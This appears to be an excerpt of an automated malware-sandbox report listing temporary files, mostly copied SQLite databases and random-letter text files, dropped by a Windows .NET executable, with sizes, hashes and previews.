                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpB710.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpD0B5.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.705615236042988
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpD0B6.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpD0C6.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.69156792375111
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpD0C7.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.705615236042988
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpD0C8.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpD0C9.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.69156792375111
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpEFF3.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpEFF4.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpF005.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpF016.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpF026.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):98304
                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpF027.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):98304
                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Entropy (8bit):7.7741335704632055
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                File name:lWnSA7IyVc.exe
                                                                                                                                                File size:703'488 bytes
                                                                                                                                                MD5:3726ee297e39481c17efbe020ef5cfcc
                                                                                                                                                SHA1:905988b5b2601a21688bc002e79fad8855969d25
                                                                                                                                                SHA256:7010f01eb61a3e6171cff3f45dffda217cab75fcd8e6055d37bb9976d1e8294f
